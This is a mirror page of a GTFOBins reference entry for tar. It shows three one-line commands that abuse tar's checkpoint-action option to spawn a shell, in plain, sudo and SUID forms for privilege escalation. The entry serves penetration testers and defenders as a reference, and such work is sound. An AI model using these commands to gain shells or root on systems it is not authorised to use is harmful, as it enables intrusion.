This website requires JavaScript.
Explore
Help
Register
Sign In
mirror
/
GTFOBins.github.io
Watch
1
Star
0
Fork
0
You've already forked GTFOBins.github.io
mirror of
https://github.com/GTFOBins/GTFOBins.github.io.git
synced
2026-01-18 05:21:35 +01:00
Code
Issues
b06bb08f96
GTFOBins.github.io
/
_gtfobins
/
tar.md
Andrea Cardaci
36dcf7a836
Reorganize function names
2018-05-25 15:30:02 +02:00
345 B
Raw
Blame
History
functions
execute-interactive
sudo-enabled
suid-limited
code
tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh
code
sudo tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh
code
./tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh